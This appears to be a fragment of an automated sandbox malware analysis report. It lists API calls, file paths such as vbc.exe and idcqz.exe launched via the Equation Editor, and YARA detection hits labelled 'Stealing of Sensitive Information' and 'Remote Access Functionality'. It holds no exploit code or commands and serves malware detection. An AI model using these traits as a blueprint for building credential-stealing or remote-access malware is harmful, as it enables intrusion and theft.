Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B53EC8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 5_2_00B53EC8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_00403646

Stealing of Sensitive Information

Source: Yara match File source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY